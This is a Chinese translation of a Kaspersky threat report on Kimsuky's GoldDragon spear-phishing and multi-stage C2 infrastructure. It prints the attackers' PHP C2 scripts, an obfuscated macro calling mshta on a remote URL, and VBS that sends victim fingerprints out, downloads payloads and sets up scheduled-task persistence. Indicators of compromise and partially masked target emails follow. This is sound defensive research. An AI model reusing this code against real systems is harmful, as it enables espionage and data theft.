freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[译]Kimsukys GoldDragon cluster and its C2 operatio...
2022-09-09 13:24:26
所属地 黑龙江省

原文地址:https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/

对原文略有改动

Kimsuky(亦被称为Thallium、Black Banshee和Velvet Chollima)是一个活跃的APT攻击组织,主要的攻击目标为韩国境内实体机构。同其他APT组织一样,该组织也会频繁更新迭代攻击工具。在2022年初,卡巴斯基就注意到该组织攻击了韩国的媒体与智库,并且通过报告的形式向其威胁情报客户提供了技术细节。

图1:Kimsuky的GoldDragon集群感染过程

在此次新的攻击行动中,该APT组织通过使用带有宏病毒的word文档,发起鱼叉式钓鱼邮件攻击。多份word社工文档被发现,每一篇都展示了不同的诱饵内容,这些内容涉及朝鲜半岛的地缘政治。

图2:诱饵文件的内容

攻击者利用HTML应用(HTML Application)文件感染目标机器,并且使用韩语来编写诱饵文档。在初始感染(initial infection)之后,会向目标机器传递一个Visual Basic脚本。在此过程中,攻击者会使用合法的博客服务来存储经过编码的恶意脚本。植入的VBS文件能够收集被感染机器的信息,随后下载经过编码的攻击载荷,最终执行一款Windows可执行程序,该程序负责从目标机器中窃取信息,包括文件列表、键盘记录以及浏览器中保存的登录口令。

在研究Kimsuky的感染链时,卡巴斯基遇到了如下问题:

  • 在分析多阶段感染过程时不易获得下个阶段的攻击载荷;
  • 即使成功连接了C2服务器获得了载荷,也很难获得相应的网络响应;
  • 很难理清各组件之间的连接;

在追踪攻击组织Kimsuky的行动时,卡巴斯基发现了上述感染链中服务端脚本。基于这一发现,重建了该攻击组织的行为特征。Kimsuky组织部署了多阶段命令与控制(C2)服务器,使用了全世界范围内的商业托管服务(commercial hosting services)。归纳总结出C2服务器的操作如下:

  1. 攻击者给目标发送鱼叉式钓鱼邮件供其下载文件;
  2. 目标点击链接后会连接第一阶段C2服务器,同时邮箱地址作为参数传递给C2;
  3. 第一阶段C2服务器会验证传入的邮箱地址参数,如果此邮箱地址在目标列表中,就会回传恶意文档。第一阶段脚本还会传递目标机器IP地址给下一阶段服务器;
  4. 当目标打开了第3步所传递的文档时,就会连接第二阶段的C2服务器;
  5. 第二阶段C2服务器上的脚本会检查从第一阶段服务器那里获得的IP地址,以验证收到的请求是否来自于同一个目标机器。使用这种IP验证机制,攻击者可以确认收到的请求是否来自目标机器;
  6. 除此之外,攻击者会依赖其他多个进程传递下一阶段的攻击载荷,例如,检查操作系统类型并且预定义user-agent字符串。

图3:C2服务器架构

用于恶意文档传输的C2脚本(download.php)

通过分析服务端脚本传递恶意文档的过程,卡巴斯基指出攻击者会验证从客户端发来的请求,以期最小化暴露攻击载荷。此脚本会使用从目标机器上获得的特殊信息,卡巴斯基由此怀疑攻击者是通过电子邮件传递下载链接或者使用其他类型的攻击载荷发送了web请求。

  1. 脚本会检查目标机器传递过来的GET参数,其中的’who’参数包含邮件地址;
if (isset($_GET['who']) && $_GET['who'] == "[redacted]") # Check 'who' parameter value
{
 $vbs_server = "weworld59.myartsonline.com";  # The next stage server
 $virus = "v.doc";               # Malicious document
 $unvirus = "un.doc";              # Benign document
 $downname = "CV.DHOM Alexandra Siddall (Korean).doc"; # Delivered file name
 $who = $_GET['who'];
 $down = $who . ".txt";
  1. 如果传入的请求包含有期望的邮箱地址,服务端脚本就会将当前日期,IP地址以及user-agent头的内容保存到[who]_downhistory.txt文档;
  2. 如果user-agent头中包含Windows字样,那就意味着目标机器操作系统是windows,程序就会转向下一步。否则的话,脚本会向目标机器传递一份无毒的文档。
  3. 接下来,脚本会通过检查是否存在[who].txt文件,来判断目标机器发来的是否是初始网络请求。
  4. 如果[who].txt文件不存在,那么就意味着这是从目标机器发过来的第一个请求,所以脚本会引导这个IP地址访问下一个服务器(VBS服务器),进而传递恶意文档。在[who].txt文档中保存目标机器的信息,包括日期、IP地址以及user-agent头。

需要注意的是,脚本会发送目标机器的IP地址到另一个服务器(被命名为“VBS服务器”)。如果目标机器是通过一个正确的电子邮件地址发起了连接,并且是初始连接,那么C2脚本就会将此IP地址引导到指定的服务器,GET形式的HTTP请求格式为/index.php?ip=。发送目标机器的IP地址到远程服务器是一个重要的步骤,攻击者通过这个方法来保障操作安全。

function send_ip($host , $data)
{
$fp = @fsockopen("tcp://".$host, 80, $errno, $errstr, 30);
if (!$fp) {
} else {
       $out = "GET /index.php?ip=".$data." HTTP/1.1\r\n";
       $out .= "Host: ".$host."\r\n";
       $out .= "Connection: Close\r\n\r\n";
       fwrite($fp, $out);
       fclose($fp);
}
}

下面的代码展示了index.php文件。脚本会在HTTP请求的ip参数中提取目标机器的IP地址,并且保存到allow.txt文件中。否则,它就会将客户端信息保存到error.txt中,并且将流量重定向到mail.google.com中。除此之外,恶意代码作者还会在重定向操作中使用多个合法的网站,例如naver.com,kida或者.kr以及其他常用的邮件服务。allow.txt(包含有合法目标机器IP地址)会被下一步的C2脚本所引用来验证收到的请求是否合法,以便判断是否进一步发送攻击载荷。

if(isset($_GET['ip'])){
     $szfilename = "allow.txt";
     $pfile = fopen($szfilename,"ab");
     $res= $_GET['ip'] . "\r\n" ;
     fwrite($pfile,$res);
     fclose($pfile);  
     exit;
}
 
$szfilename = "error.txt";
$pfile = fopen($szfilename,"ab");
$res= $date . "-" . "\r\n".$ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n";
fwrite($pfile,$res);
fclose($pfile);  
header('Location: https://mail.google.com');

卡巴斯基发现恶意的文档和无毒的文档均是通过这个脚本来传送。攻击者保存了一对文档,一个是无毒的(un.doc)另一个则包含恶意代码(v.doc)。根据对目标的验证结果来发送相应的文档。诱饵文档的内容包含多个主题,其中有“2022亚洲领导人会议”日程、酬金申请表以及一份澳大利亚外交官的简历。由此可见,攻击者使用了目标机构工作人员感兴趣的内容。

图4:诱饵文档

恶意文档以及传递下一阶段攻击载荷的方法

传递给目标机构的文档包含有获取下一阶段攻击载荷的宏指令。宏指令实现了一个简单的功能,就是生成了多个windows命令行shell的子进程。采取这一做法的目的可能是为了躲避安全厂商对代码的行为分析。最终宏会使用mshta.exe执行获取到的攻击载荷,进而执行微软HTML应用。下面的几行代码是恶意宏中的一部分,它包含一个远程服务器地址用来获取下一阶段攻击载荷。

cmd = "c" + "md /" + "c c" + "md /" + "c cm" + "d /" + "c c" + "m" + "d /" + "c c" + "md /" + "c c" + "md /" + "c msht" + "a.e" + "xe hxxp://leehr24.mywebcommunity[.]org/h.php"
Shell cmd, 0
Sleep 9000
cmd = "cm" + "d /" + "c TAS" + "KKI" + "LL /" + "F /" + "IM msh" + "ta.e" + "xe"
Shell cmd, 0

卡巴斯基发现了对应的C2脚本代码(h.php),这一脚本将入站的流量信息保存到log.txt文件中,包括日期、IP地址、user-agent以及IP地址的MD5值中最右端20个字符,在程序内部被称为“TID”(可能是“Target ID”的缩写),接下来会检查用于保存已验证目标机器IP地址的文件allow.txt是否存在。只有当客户端IP地址存在于allow.txt中时,保存有下一阶段攻击载荷的h.txt才会通过HTTP响应发送给客户端。否则,脚本会传递一段Visual Basic脚本用于终止mshta.exe进程。

$downfile = "h.txt";
$logfile = "log.txt";
$allow_file = "allow.txt";
 
$handle = fopen($logfile, "ab");
fwrite($handle, $date ."\r\n" . $ip . "\r\n" . $_SERVER['HTTP_USER_AGENT']."\r\n"."id=".$TID."---------\r\n");
fclose($handle);
 
if(file_exists($allow_file)){
    $fp = fopen($allow_file,"r");
    $content = fread($fp, filesize($allow_file));
    fclose($fp);
    if(!stristr($content,$ip )){
     echo 'Set objShell = CreateObject("Wscript.shell")
     objShell.run "TASKKILL /F /IM mshta.exe" , 0 , False';
     exit;
    }
}

来自VBS服务器的VBS脚本

执行恶意Word文档中的宏代码会使得目标机器获取并执行HTML应用(.HTA)载荷。获取的HTA文件有两个功能:将目标机器的信息回传给C2服务器,并且创建一个计划任务实现自动执行。Kimsuky会高度复用他们的代码,例如,word宏中的VBA、Visual Basic脚本以及HTML应用。

发送的数据包含ProgramFiles文件夹路径,杀软名称,最近打开的文件列表,用户名,操作系统名字,操作系统版本,微软office版本,.NET framework版本,桌面文件夹的文件列表以及用户固定在任务栏中的内容。当脚本将收集到的信息传递给C2服务器时,它会通过/info.php?ki87ujhy=的http请求格式来发送信息,Kimsuky常用这种格式来收集“指纹”信息。尤其是,它使用了硬编码的user-agent,包含故意拼写错误的单词“Chnome”。通过查看代码,卡巴斯基找到了User-agent中出现“chnome”而不是“Chrome”的原因。

ProgramFilesFolder = objShell.ExpandEnvironmentStrings("%ProgramFiles%")
ProgramFilesx86Folder = objShell.ExpandEnvironmentStrings("%ProgramFiles(x86)%")
drl = server_url + "/info.php?ki87ujhy=" + ProgramFilesx86Folder + "&rdxvdw=" + ProgramFilesFolder
..[redacted]..
Post = "v=" + AntiVirusName + "&r=" + recentlist + "&un=" + UserName + "&os=" + os + "&sv=" + Version + "&msv=" + GetOfficeVersionNumber + "&dnv=" + dnv + "&dll=" + desktop_lnk + "&tll=" + taskbar_lnk
 
Dim WinHttpReq
Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "POST", drl, False
WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36"
WinHttpReq.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
WinHttpReq.setRequestHeader "Content-Length", Len(Post)
WinHttpReq.Send Post

除了回传敏感信息的功能之外,脚本还会下载攻击载荷,并且通过持久化机制来注册它。这款代码在Kimsuky脚本中被高度复用,从s.php中获取攻击载荷,并且把它保存到defs.ini文件中。注册该文件为windows计划任务,并且命名为“OneDrive Clean”。

Set shell_obj = CreateObject("WScript.Shell")
ini_file = shell_obj.expandenvironmentstrings("%appdata%") & "\defs.ini"
drl = server_url + "/s.php"
Set WinHttpReq= CreateObject("MSXML2.ServerXMLHTTP.6.0")
WinHttpReq.Open "GET", drl,False
WinHttpReq.setRequestHeader "User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chnome/97.0.4692.99 Safari/537.36"
WinHttpReq.send
If WinHttpReq.Status=200 Then
Set oFile = CreateObject("Scripting.FileSystemObject")
Set ofp = oFile.CreateTextFile(ini_file, 2)
ofp.Write kjhskfjaskdjf(res)
ofp.Close
End If
 
cmd1 = "w" + "sc" + "ript.e" + "xe //" + "e:v" + "bsc" + "ript //b """"" + ini_file + """"""
cmd2 = "scht" + "asks /cr" + "eate /s" + "c mi" + "nute /mo 30 /tn ""OneDrive Clean"" /tr """ + cmd1 + """"
shell_obj.run cmd2 ,0,False

在调查过程中,卡巴斯基发现了对应的C2脚本(s.php)用于传递攻击载荷来实现自动执行的功能。所传递的VBS攻击载荷的主要功能是访问合法的blog,解析收到的POST请求,最终获得下一阶段的攻击载荷。有趣的是,这个C2脚本是基于目标机器的IP地址生成的blog地址。在计算目标机器IP地址的MD5哈希值之后,程序截取最后的20位字符,并且用它来构造blog地址。攻击者此处的用意是为每一个目标机器提供专属的虚假博客,这样的话就可以减少其恶意软件与基础设施(infrastructure)的曝光。除此之外,脚本还会检查user-agent头中是否包含特殊字符串“chonme”。就像上面提到的那样,Visual Basic Script会连接这个C2脚本,其中使用包含有硬编码“chonme”的User-Agent头,脚本检查这一有意而为之的错误拼写,以验证这是从真实的目标机器上发来的请求。

$filename = hash("md5" , $ip);
$filename = str_replace("+" , "" , $filename);
$filename = str_replace("=" , "" , $filename);
$filename = str_replace("/" , "" , $filename);
$filename = right($filename , 20);
$logfile = $filename.".txt";
$errorfile = "error.txt";
if(stristr($_SERVER['HTTP_USER_AGENT'] , "chnome"))
{
 
   $url = base64_encode("https://" . $filename . ".blogspot.com/2022/04/1.html");
   $spy_script = 'Function hhgtttgffgg(ByVal base64String)
   On Error Resume Next
   Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
   Dim dataLength, sOut, groupBegin

基于上面的发现与分析,卡巴斯基曝光了攻击者所采用的的隐藏网络资源的方式,使得对于安全研究人员和自动分析系统来说获得攻击载荷会更加困难。

图5:C2脚本中用到的技巧

被攻击目标

基于诱饵文档的内容,卡巴斯基猜测此次行动的目标是与政府或者外交相关的个人或者实体组织。同时,历史上,政客、外交官、记者、教授以及朝鲜的脱北者都是Kimsuky的主要攻击目标。基于C2脚本中的电子邮箱地址,卡巴斯基进一步确认了这种猜测。C2脚本中只有部分电子邮箱地址,所以可以从外交和学术领域推断完整的电子邮件地址和这些邮箱的拥有者。

Email name

Suspected email

Delivered file name

Email owner

yk****

yk****@***.ac.kr

unknown

South Korean university professor

lee****

lee****@gmail.com

CV.DHOM Alexandra Siddall (Korean).doc

Director General of South Korean government organization

chon****

chon****@naver.com

CV.DHOM Alexandra Siddall (Korean).doc

Researcher at Defense Analyses

woo******

Unknown

CV.DHOM Alexandra Siddall (Korean).doc

Think-tank researcher

scc*****

scc*****@naver.com

CV.DHOM Alexandra Siddall (Korean).doc

Researcher of think-tank

won***

won***@****.ac.kr

CV.DHOM Alexandra Siddall (Korean).doc

South Korean university professor

thk*****

thk*****@naver.com

CV.DHOM Alexandra Siddall (Korean).doc

South Korean university professor

kim*****

kim*****@gmail.com

CV.DHOM Alexandra Siddall (Korean).doc

South Korean university professor

kim***

Unknown

2022년AL(220412).doc

Asian Leadership Conference

Probably former Korean Ambassador to the United Nations

jh******

jh******@****.ac.kr

[양식]사례비지급의뢰서.doc

([Template]Pay honorarium.doc)

Professor of South Korea university

jung******

jung******@gmail.com

[양식]사례비지급의뢰서.doc

Representative of Research Council for North Korea

sung*********

sung*********@gmail.com

[양식]사례비지급의뢰서.doc

Assistant professor at South Korean university

结论

Kimsulky是朝鲜半岛最活跃的攻击组织之一,它会操纵多个计算机集群(尤其经常使用GoldDragon集群)。卡巴斯基发现Kimsuky会持续改进其恶意软件的感染机制,采用新奇的技术来规避安全厂商的分析。追踪该组织最大的困难在于获取完整的感染链。从这篇研究文章中可见,最近攻击者在C2服务器中采取了目标认证的方式。尽管很难获得服务端的组件,但如果从被攻击目标一侧分析攻击者的服务器和恶意软件,还是能够比较全面地理解攻击者是怎样部署控制它们的基础设施(infrastructure)和攻击工具的,以及它们应用了哪种技术。

Indicators of Compromise

Malicious documents

238e6952a990fd3f6b75569feceb26a2 
edde6a385c86f60342831f24c3651925 
b6ba7e07b4867e4bd36dc9713744aedc 
7a3e966d30fe5d52cfe97d998e8c49cb 
596251e844abdaa77eeca905f0cb7677 
3fa45dcacf2193759086319c0d264341 
75ae786fe89491dc57509801c212fa8b 
c0097cfa2e05ab1d18cf3dad93d98050 
b80d15cbb729e6ca86e3b41924407c30 
85f24b0f10b77b033e6e66ae8b7d55fc 
40de99fb06e52e3364f2cd70f100ff71 
5f38c57f83ee5d682ddf692442204fba 
b237b484c5c0fb020952e99b1134a527 
96f5ef3d58a750a6db60f2e0566dc6e6 
3265b2d5e61971c43a076347fb405c4b 
d9f2acfed7ede76f110334e2c572b74e

CHM file

c4a69dab3f8369d2f823c538590de345

Visual Basic Scripts

23XXX11baa6cc9e562185571579ce5bc 
62b0fa29bcc317c59c5f5e7fd3a867bc 
8bb7c8e8b723b02ffdcf6ff52444a810 
8d28e28c1ee6f133441b6d71f7f8bcba 
32dda97cab8876215d771e398dd10f84 
226f7677052f636a9a4f6e95b9e8b864 
2c73cf2356a9005850fb2d07d024b2f2 
f37afe7e072b26a2de22e16074f62294 
bd0f789ace4def9196ce26588c3f41f8 
a889a22d09286d71fb83fae5c0ff1c96 
a87614a2c7c66c7f13f0b170e4837ede 
3361fa242eb7e6162fd4682471f4e952 
b18d2d4e77fc567306d406c75b75dc53 
ea5c59741ff0ac27f45c4a9a508514c2 
86b523d2f19e1628e8c74602a51ebff9 
0a050b4239032ec76f1e244bceb435eb 
07b2457f6e71d0b75693b6fecf9c88e7 
e5682b7fb53cb478550df7f51bca6175 
4433edb19f368e56d903a4ed0aa25a2e 
72016ca15de6a0528fb9a9d0ac85d8b5 
8b6d472fa9ec0023d7a35bdd7b8b2d4f 
611c1a2771108730fde487bbb6d680d4 
bb6662ed3f058a737674be6749c7e6f2 
407fd3c14a19a6b682b0b7ecca0b0c8a 
157e31eb70e2f28059f100f85317fcce 
7cb5dca82ad330db0dde62a34ad3f692 
7953f5b1ed7b0b0ac778a2d47f44195c 
c41f178a41aec6e7a28723ea70c3bd3b 
e4df8b86d669e1eb36add172972bcb27 
20389c0e7f03e5df407ffcf5811eee09 
e36cee3e23f3ab5557e547ce02b5bf3d 
ddf966990bc4bdb40b67b8eda0ae1fd7 
beb6601397e208d2793aaa7be297b0f4 
c791d7fc5216d4035825f4efb714ba0e 
71def16f01ce0f57afe7b19c104a24e5

HTML Application

a871511ef8abae9f103a3dfe77b12b6d 
c5ad15506ab05f054d547587111d6393 
25eed4e06f9ed309331aaa6418ebd90d 
809f60589ee8be7daf075446c2180eaa 
5b5247ee7b43f51092ab07a1d1a31936 
8735788b2422c7ab910953178af57376

Windows executable payload

490b2496434e6a20dae758d0b6fc6e00 
56b5fec59e118ba324ccee8a336f7f12 
56df55ef50e9b9c891437c7148a0764a

Server scripts

8289771e7eeffd28fb8a9e1bdeb3e86c
dfb8d00ce89172bfc7ee7b73b37129a9
7fb868e6baf93a86d7a6a17ac00f4827

Domains and IPs

Malicious document hosting servers:

attach.42web[.]io

attachment.a0001[.]net

bigfile[.]totalh[.]net

clouds[.]rf[.]gd

global[.]onedriver[.]epizy[.]com

global.web1337[.]net

C2 servers:

hxxp://leehr36[.]mypressonline[.]com/h[.]php

hxxp://leehr24[.]mywebcommunity[.]org/h[.]php

hxxp://weworld59[.]myartsonline[.]com/h[.]php

hxxp://weworld78[.]atwebpages[.]com/info[.]php?ki87ujhy=

hxxp://weworld78[.]atwebpages[.]com/s[.]php

hxxp://weworld78[.]atwebpages[.]com/hta[.]php

hxxp://weworld79[.]mygamesonline[.]org/hta[.]php

hxxp://glib-warnings[.]000webhostapp[.]com/info[.]php?ki87ujhy=

hxxp://glib-warnings[.]000webhostapp[.]com/s[.]php

hxxp://glib-warnings[.]000webhostapp[.]com/hta[.]php

hxxp://0knw2300[.]mypressonline[.]com/d[.]php

hxxp://21nari[.]getenjoyment[.]net/info[.]php?ki87ujhy=

hxxp://21nari[.]mypressonline[.]com/s[.]php

hxxp://21nari[.]scienceontheweb[.]net/r[.]php

hxxp://chmguide[.]atwebpages[.]com/?key=cWFLQ2hCU3ZTaUNha3hVaGdZSXRyQT09

hxxp://chunyg21[.]sportsontheweb[.]net/info[.]php?ki87ujhy=

hxxp://chunyg21[.]sportsontheweb[.]net/s[.]php

hxxp://faust22[.]mypressonline[.]com/1[.]txt

hxxp://faust22[.]mypressonline[.]com/info[.]php

hxxp://hochdlincheon[.]mypressonline[.]com/f[.]txt

hxxp://hochuliasdfasfdncheon[.]mypressonline[.]com/report[.]php?filename=

hxxp://hochulidncheon[.]mypressonline[.]com/c[.]txt

hxxp://hochulidncheon[.]mypressonline[.]com/k[.]txt

hxxp://hochulincddheon[.]mypressonline[.]com/post[.]php

hxxp://hochulincheon[.]mypressonline[.]com/c[.]txt

hxxp://hochulincheon[.]mypressonline[.]com/down[.]php

hxxp://hochulincheon[.]mypressonline[.]com/f[.]txt

hxxp://hochulincheon[.]mypressonline[.]com/k[.]txt

hxxp://hochulincheon[.]mypressonline[.]com/post[.]php

hxxp://hochulincheon[.]mypressonline[.]com/report[.]php?filename=

hxxp://hochulincheon[.]mypressonline[.]com/w[.]txt

hxxp://hochulincheon[.]mypressonline[.]com/h[.]php

hxxp://hochulindcheon[.]mypressonline[.]com/w[.]txt

hxxp://hochulindddcheon[.]mypressonline[.]com/post[.]php

hxxp://hochulinsfdgasdfcheon[.]mypressonline[.]com/post[.]php

hxxp://koreajjjjj[.]atwebpages[.]com/1[.]hta

hxxp://koreajjjjj[.]sportsontheweb[.]net/k[.]php

hxxp://kpsa20201[.]getenjoyment[.]net/d[.]php

hxxp://o61666ch[.]getenjoyment[.]net/post[.]php

hxxp://o61666ch[.]getenjoyment[.]net/report[.]php?filename=

hxxp://yulsohnyonsei[.]atwebpages[.]com/1[.]hwp

hxxp://yulsohnyonsei[.]atwewbpages[.]com/d[.]php

hxxp://yulsohnyonsei[.]medianewsonline[.]com/1[.]hwp

hxxp://yulsohnyonsei[.]medianewsonline[.]com/1[.]txt

hxxp://yulsohnyonsei[.]medianewsonline[.]com/info[.]php?ki87ujhy=

hxxp://yulsohnyonsei[.]medianewsonline[.]com/ksskdh/d[.]php

hxxp://yulsohnyonsei[.]medianewsonline[.]com/post[.]php

hxxp://yulsohnyonsei[.]medianewsonline[.]com/report[.]php?filename=

hxxp://dmengineer[.]co[.]kr/images/s_title16[.]gif  Legitimate/compromised

hxxp://dmengineer[.]co[.]kr/images/s_title17[.]gif  Legitimate/compromised

hxxp://dmengineer[.]co[.]kr/images/s_title18[.]gif  Legitimate/compromised

Blog URL

hxxps://225b4d3c305f43e1a590[.]blogspot[.]com/2022/01/1[.]html

hxxps://225b4d3c305f43e1a590[.]blogspot[.]com/2022/02/1[.]html

hxxps://3a8f846675194d779198[.]blogspot[.]com/2021/10/1[.]html

hxxps://c52ac2f8ac0693d8790c[.]blogspot[.]com/2021/10/1[.]html

hxxps://leejong-sejong[.]blogspot[.]com/2022/01/blog-post[.]html

# apt # APT
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者